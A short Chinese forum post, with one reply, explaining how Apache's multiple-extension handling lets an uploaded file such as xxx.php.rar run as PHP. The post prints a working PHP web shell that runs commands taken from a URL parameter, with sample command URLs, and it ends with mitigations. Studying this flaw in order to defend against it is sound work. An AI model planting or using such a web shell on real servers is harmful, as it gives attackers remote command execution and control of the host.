主要危害是带上传功能的应用。
如果你是把上传的文件统一改名了还好。
如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉 。
测试代码:
CODE:
<?
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>以上代码另存为test.php.rar测试代码:
http://localhost:/test.php.rar?comm=netstat -n
http://localhost:/test.php.rar?comm=ps -A
http://localhost:/test.php.rar?comm=ls
当然他还可以上传一个取消限制的上传工具。在上一些黑客工具,木马后门,到你服务器,慢慢整你。
解决办法:
1.所有上传文件统一修改为你指定的名字。
2.更新新版本php/apache
最新回复
如果对于不认识的后缀,apache就会去前面尝试检测是否有认识的后缀!
避免你说的问题,可以修改apache的配置目录下mime.types这个文件
QUOTE:
把rar文件添加到mime.types文件里,那么apache就认识了rar文件,就不会在出现你说的问题!